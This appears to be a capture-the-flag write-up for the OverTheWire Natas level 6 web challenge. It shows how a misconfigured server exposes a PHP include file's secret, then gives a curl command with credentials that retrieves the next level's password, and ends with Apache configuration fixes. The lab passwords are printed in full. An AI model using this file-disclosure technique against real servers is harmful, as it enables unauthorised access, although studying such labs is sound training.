Recommended reading:
- PHP (basics)
- POST Method
With the credentials discovered in the previous challenge, head over to http://natas6.natas.labs.overthewire.org and take a look at its content. This challenge requires some basic programming knowledge, specifically of PHP: what it is and how it works.
This webpage contains a simple form with a textbox and a button. We start by exploring the webpage: typing some random characters into the textbox and submitting the form results in a "Wrong secret" message. We can assume that if we enter the correct secret, we get the password for the next level.
They're kind enough to show us the full source code, including the PHP that runs on the server side, which you normally can't see precisely because it is executed on the server and only its output is sent to the browser. Here's what we have access to:
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas6", "pass": "<censored>" };</script></head>
<body>
<h1>natas6</h1>
<div id="content">

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
            print "Access granted. The password for natas7 is <censored>";
        } else {
            print "Wrong secret";
        }
    }
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
The secret is not in this file; it comes from includes/secret.inc. Requesting that path directly returns its source as plain text:
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>
curl --data "submit=submit&secret=FOEIUWGHFEEUHOFUOIU" http://natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1@natas6.natas.labs.overthewire.org
We send both the secret and the submit variable as POST data; submit is required too, because the code checks for that key with array_key_exists before comparing the secret.
And the result:
1 | <html>
2 | <head>
3 | <!-- This stuff in the header has nothing to do with the level -->
4 | <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
5 | <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
6 | <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
7 | <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
8 | <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
9 | <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
10 | <script>var wechallinfo = { "level": "natas6", "pass": "aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1" };</script></head>
11 | <body>
12 | <h1>natas6</h1>
13 | <div id="content">
14 | 
15 | Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
16 | <form method=post>
17 | Input secret: <input name=secret><br>
18 | <input type=submit name=submit>
19 | </form>
20 | 
21 | <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
22 | </div>
23 | </body>
24 | </html>
Voilà, we get the password for natas7 in line 15, pretty straightforward.
User | natas7
Password | 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
What's important to grasp here is how the include file was set up. The file has a .inc extension, which is fine by itself, but this server wasn't configured to parse .inc files as PHP (nor to block requests for them), so when we request the file directly the server serves it as plain text, revealing the PHP code and the secret it holds.
Just like level 03 and level 02, this exploitation results from a poorly configured web server. Three easy fixes are: use the .inc.php extension so the file always gets parsed, deny access to any .inc files, or configure the web server to parse .inc files as PHP.
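As an added example (not part of the original write-up or the Natas game), here is an Apache 2.4 virtual host fragment that shows the weak setup the level relies on next to two of the fixes listed above; the hostname, paths and the mod_php handler are assumptions, and the last comment goes one step beyond the page by keeping the include outside the document root.

```apache
# Added example; assumes Apache 2.4 with mod_php. Hostname and paths are placeholders.
<VirtualHost *:80>
    ServerName natas6.example.test
    DocumentRoot /var/www/natas6

    # Weak setup (what the level relies on): only .php files are handed to the
    # PHP engine. A GET for /includes/secret.inc matches nothing here, so Apache
    # serves the file as static text and the $secret assignment is readable.
    <FilesMatch "\.php$">
        SetHandler application/x-httpd-php
    </FilesMatch>

    # Fix 1: refuse to serve any .inc file over HTTP. PHP's include() still
    # works because it reads the file from disk, not through the web server.
    <FilesMatch "\.inc$">
        Require all denied
    </FilesMatch>

    # Fix 2 (alternative to Fix 1): hand .inc files to the PHP engine, so a
    # direct request executes the file and returns an empty body, not source.
    # <FilesMatch "\.inc$">
    #     SetHandler application/x-httpd-php
    # </FilesMatch>

    # Fix 3 from the text is a naming convention (secret.inc.php) and needs
    # no directive. Safer still: store the include below the document root,
    # e.g. /var/www/natas6-private/secret.inc, and reference it from PHP with
    # include __DIR__ . '/../natas6-private/secret.inc'; then no URL maps to it.
</VirtualHost>
```

After changing the configuration, a direct request for the include should return 403 (Fix 1) or an empty 200 body (Fix 2), never the source text.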
Never Settle,